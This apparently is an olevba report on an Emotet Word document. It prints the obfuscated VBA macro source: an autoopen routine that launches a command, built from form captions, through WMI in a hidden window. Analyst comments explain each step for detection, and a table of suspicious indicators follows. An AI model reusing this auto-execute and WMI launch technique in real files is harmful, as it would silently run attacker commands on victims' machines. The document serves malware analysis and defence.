@irshadqemu
Created November 15, 2020 20:55
olevba 0.55.1 on Python 2.7.18 - http://decalage.info/python/oletools
===============================================================================
FILE: emotet.doc
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO S9zlQCC.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/S9zlQCC'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO EELFLr.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/EELFLr'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO TrS1jk.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/TrS1jk'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO BdOW1qt.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/BdOW1qt'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Uq3XXQaF.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/Uq3XXQaF'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO EIBYN39s.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/EIBYN39s'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO V9sPZLU.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/V9sPZLU'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO pGv5GKCO.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/pGv5GKCO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function vzVjQz()
' Analysis notes (defender view of the extracted macro source):
' Builds a command line from form-control captions stored in the document and
' launches it through WMI (Win32_Process.Create). Called from autoopen.
' Most of the body is filler: arithmetic on variables that are never assigned
' anywhere in this source, whose results (G9zncq, LnIAVE4, fd61pMMd, ...) are
' never read again. The repeated "On Error Resume Next" keeps that filler from
' aborting the procedure when it raises runtime errors (e.g. For Each over an
' Empty variant).
' Caveat: the olevba report flags VBA stomping for this file, so the P-code that
' actually executes may differ from the source text shown here.
On _
Error Resume Next
G9zncq = (YVZLjB85 + Rnd(86) + (4222 + Cos(8992 * Rnd(UJ4Vqfvr) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(104 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
fd61pMMd = 512 * ChrW(zTDlnFW) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (TlEu4dn + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set OU4wzDU_ = bWzdfi7
' The one line that matters for the command: GS0LWK is the concatenation of the
' Caption properties of three controls on ThisDocument plus two variables that
' are never assigned here. The caption text lives in the document/form, not in
' the VBA stream, so the command line is not recoverable from this listing alone.
GS0LWK = zqzYlm3 + ThisDocument.McQHX3.Caption + ThisDocument.PWo3kW.Caption + ThisDocument.psYO9m.Caption + UR1S3b
On _
Error Resume Next
E8XQw6 = (bE0j9Ui5 + Rnd(338) + (4222 + Cos(8992 * Rnd(GLiWOi_) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(731 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
sJUOza = 512 * ChrW(nw28atwu) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (wdFzjT + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set vhuszR6 = rN2MG_
On _
Error Resume Next
aC9tGX = (uUBMaP + Rnd(655) + (4222 + Cos(8992 * Rnd(fHOdUi) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(895 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
nUnKR8o = 512 * ChrW(YMtfHC) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (FoWIAw + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set c8_cpwB = zwuF49r
' Process creation. Replace() strips the spaces from the literal, leaving the
' moniker "winmgmts:Win32_Process" (the spaces only exist to defeat string
' matching). Win32_Process.Create takes (CommandLine, CurrentDirectory,
' ProcessStartupInformation, ProcessId): the command line is GS0LWK plus an
' unassigned variable, and the third argument invokes the u0rrBWd function
' (defined below), which supplies the startup-information object.
' Detection note: launching via WMI rather than Shell means the new process is
' not a direct child of the Word process in process-tree telemetry — confirm the
' observed parent in sandbox output before writing a parent/child rule.
RcTkkOqw = CreateObject(Replace("w i nm gmts:Win 32 _Pr oc ess", " ", "")).Create(GS0LWK + IEHlwRq, W8KjQY, u0rrBWd, l78zbRfV)
On _
Error Resume Next
jTzFBB = (movZQtjv + Rnd(334) + (4222 + Cos(8992 * Rnd(EAMc9D) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(664 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
Ctpu4ftY = 512 * ChrW(EkbiAj) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (XVBccQd + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set s9NVwH = WR_wPr3Y
' No return value is ever assigned to vzVjQz; the function is used purely for
' its side effect.
End Function
-------------------------------------------------------------------------------
VBA MACRO zacGkX9.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/zacGkX9'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
' Analysis notes (defender view of the extracted macro source):
' Auto-executing entry point — Word runs this when the document is opened
' (olevba lists it under AutoExec). Apart from filler arithmetic on never-
' assigned variables, its only effect is the call to vzVjQz in the middle of
' the body. "On Error Resume Next" suppresses the runtime errors the filler
' raises so execution reaches that call.
' Caveat: olevba reports VBA stomping for this file, so the executed P-code may
' not match this source text.
On _
Error Resume Next
wuhj5u = (QWhXZiV + Rnd(986) + (4222 + Cos(8992 * Rnd(kf8CcM) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(892 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
Qa9atL = 512 * ChrW(VlHilWoa) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (MEz37an4 + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set IFjhja = wJlK3r
' The only meaningful statement: hands control to the procedure that performs
' the WMI process creation (Function vzVjQz in module pGv5GKCO).
vzVjQz
On _
Error Resume Next
XjhCsH5t = (XVDjpH3 + Rnd(280) + (4222 + Cos(8992 * Rnd(BaBpfF) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(444 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
hw8NNlz = 512 * ChrW(qlk6q2_) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (CTLvSTn + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set Za6C90f = KWPvOvJS
End Sub
Function u0rrBWd()
' Analysis notes (defender view of the extracted macro source):
' Returns the object that vzVjQz passes as the ProcessStartupInformation
' argument of Win32_Process.Create. The class moniker is assembled from a
' form-control caption plus the literal "Startup"; the caption text is not in
' the VBA stream, so the full moniker is not visible here, but the "Startup"
' suffix together with the ShowWindow assignment below is consistent with a
' WMI Win32_ProcessStartup instance — NOTE(review): confirm from the caption.
' Everything else in the body is filler on never-assigned variables, kept from
' aborting the function by "On Error Resume Next".
' Caveat: olevba reports VBA stomping for this file, so the executed P-code may
' not match this source text.
On _
Error Resume Next
w0tVAR = (UvwY_w2 + Rnd(842) + (4222 + Cos(8992 * Rnd(REjNZU) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(927 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
DEdXV9 = 512 * ChrW(H49MOD) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (zYE0jXuq + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set T2IBjoKJ = CPCwcG
' Assigns the function's return value (VBA convention: assign to the function
' name). z6zhmi and YfUK5MYA are never assigned in this source, so the visible
' parts of the moniker are the caption and the literal "Startup".
Set u0rrBWd = CreateObject(z6zhmi + ThisDocument.hjL90Njk.Caption + "Startup" + YfUK5MYA)
On _
Error Resume Next
dlcvKIwk = (CRKhA_jf + Rnd(192) + (4222 + Cos(8992 * Rnd(T26ck3A) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(11 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
rDhczOL0 = 512 * ChrW(krL1ZhNF) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (q7tYSW + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set AKSIPq18 = STzBUj60
' Sets the ShowWindow property on the object just created (the statement is
' split over three lines with "_" continuations; the trailing "!" is a
' type-declaration suffix the parser tolerates, not part of the member name).
' None of the six summands is assigned anywhere in this source; if they are
' Empty variants the sum evaluates to 0, i.e. a hidden window, which matches
' olevba's "ShowWindow - May hide the application" finding — NOTE(review):
' assumes no Option Explicit and no definitions in the other modules, which
' olevba lists as empty.
u0rrBWd. _
ShowWindow! _
= idm89H + t_4HtlR2 + GcQ0OP + E9KJrnE + riC9rvum + Swt5C6J5
On _
Error Resume Next
Bq4RTMp1 = (R5QGHj5F + Rnd(894) + (4222 + Cos(8992 * Rnd(l2NHvVM) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(262 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
YsHK1izD = 512 * ChrW(Vt1lB0J) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (L_w6MRPL + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set b0_jB1EO = jUdkfc5
On _
Error Resume Next
JvKCRbY = (MYDp39w + Rnd(829) + (4222 + Cos(8992 * Rnd(drcmu54) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(816 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
btqQZCP = 512 * ChrW(Xi8u3HTl) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (b67OEj8i + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set AQK7_3d = zAZIDWEn
End Function
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |autoopen |Runs when the Word document is opened |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|ShowWindow |May hide the application |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|ChrB |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|ChrW |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|VBA Stomping |VBA Stomping was detected: the VBA source |
| | |code and P-code are different, this may have |
| | |been used to hide malicious code |
+----------+--------------------+---------------------------------------------+
VBA Stomping detection is experimental: please report any false positive/negative at https://github.com/decalage2/oletools/issues